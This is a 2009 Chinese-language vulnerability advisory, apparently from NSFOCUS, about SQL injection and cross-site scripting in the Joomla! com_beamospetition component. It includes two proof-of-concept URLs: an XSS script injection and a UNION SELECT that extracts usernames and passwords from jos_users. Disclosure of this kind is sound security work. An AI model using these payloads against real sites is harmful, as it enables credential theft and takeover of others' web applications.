安全研究
安全漏洞
Joomla! com_beamospetition组件SQL注入及跨站脚本执行漏洞
发布日期:2009-01-22
更新日期:2009-01-24
受影响系统:Arthur Konze com_beamospetition 1.0.12
Arthur Konze com_beamospetition
描述:
BUGTRAQ ID:
33391
Joomla!是一款开放源码的内容管理系统(CMS)。
Joomla!的com_beamospetition组件实现上存在输入验证漏洞,远程攻击者可能利用此漏洞实现SQL注入或跨站脚本执行攻击。
攻击者可以利用这些漏洞窃取认证信息或获取对应用的控制。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/?option=com_beamospetition&func=sign&pet='><script>alert('Xss')</script>
http://www.example.com/?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/建议:
厂商补丁:
Arthur Konze
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://joomlacode.org/gf/project/beamospetition/浏览次数:2337
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
